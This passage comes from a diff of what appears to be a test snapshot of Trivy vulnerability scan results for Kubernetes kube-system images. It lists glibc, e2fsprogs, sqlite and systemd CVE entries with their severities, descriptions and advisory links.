a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://ubuntu.com/security/CVE-2019-1010025", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", - }, - { - "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], "severity": "LOW", @@ -146758,6815 +148394,5542 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20386", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1304", + "installedVersion": "1.46.2-2", + "packageName": "libcom-err2", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", - "https://access.redhat.com/security/cve/CVE-2019-20386", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", - "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", - "https://linux.oracle.com/cve/CVE-2019-20386.html", - "https://linux.oracle.com/errata/ELSA-2020-4553.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", - "https://security.netapp.com/advisory/ntap-20200210-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-20386", + "https://access.redhat.com/errata/RHSA-2022:8361", + "https://access.redhat.com/security/cve/CVE-2022-1304", + "https://bugzilla.redhat.com/2069726", + "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "https://errata.rockylinux.org/RLSA-2022:8361", + "https://linux.oracle.com/cve/CVE-2022-1304.html", + "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "https://ubuntu.com/security/notices/USN-5464-1", + "https://www.cve.org/CVERecord?id=CVE-2022-1304", ], }, "category": "Vulnerability", - "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", + "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20386", + "value": "https://avd.aquasec.com/nvd/cve-2022-1304", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8361", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20386", + "value": "https://access.redhat.com/security/cve/CVE-2022-1304", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "value": "https://bugzilla.redhat.com/2069726", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "value": "https://errata.rockylinux.org/RLSA-2022:8361", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", + "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", + "value": "https://ubuntu.com/security/notices/USN-5464-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-8457", + "installedVersion": "5.3.28+dfsg1-0.8", + "packageName": "libdb5.3", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + "https://access.redhat.com/security/cve/CVE-2019-8457", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://linux.oracle.com/cve/CVE-2019-8457.html", + "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "https://security.netapp.com/advisory/ntap-20190606-0002/", + "https://ubuntu.com/security/notices/USN-4004-1", + "https://ubuntu.com/security/notices/USN-4004-2", + "https://ubuntu.com/security/notices/USN-4019-1", + "https://ubuntu.com/security/notices/USN-4019-2", + "https://usn.ubuntu.com/4004-1/", + "https://usn.ubuntu.com/4004-2/", + "https://usn.ubuntu.com/4019-1/", + "https://usn.ubuntu.com/4019-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "https://www.oracle.com/security-alerts/cpuapr2020.html", + "https://www.oracle.com/security-alerts/cpujan2020.html", + "https://www.oracle.com/security-alerts/cpujul2020.html", + "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "https://www.sqlite.org/releaselog/3_28_0.html", + "https://www.sqlite.org/src/info/90acdbfce9c08858", ], }, "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "name": "sqlite: heap out-of-bound read in function rtreenode()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://avd.aquasec.com/nvd/cve-2019-8457", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://access.redhat.com/security/cve/CVE-2019-8457", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://ubuntu.com/security/notices/USN-4004-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://ubuntu.com/security/notices/USN-4004-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://ubuntu.com/security/notices/USN-4019-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31437", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31437", + "value": "https://ubuntu.com/security/notices/USN-4019-2", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://usn.ubuntu.com/4004-1/", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://usn.ubuntu.com/4004-2/", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://usn.ubuntu.com/4019-1/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31438", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31438", + "value": "https://usn.ubuntu.com/4019-2/", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31439", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31439", + "value": "https://www.oracle.com/security-alerts/cpujul2020.html", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://www.sqlite.org/releaselog/3_28_0.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": 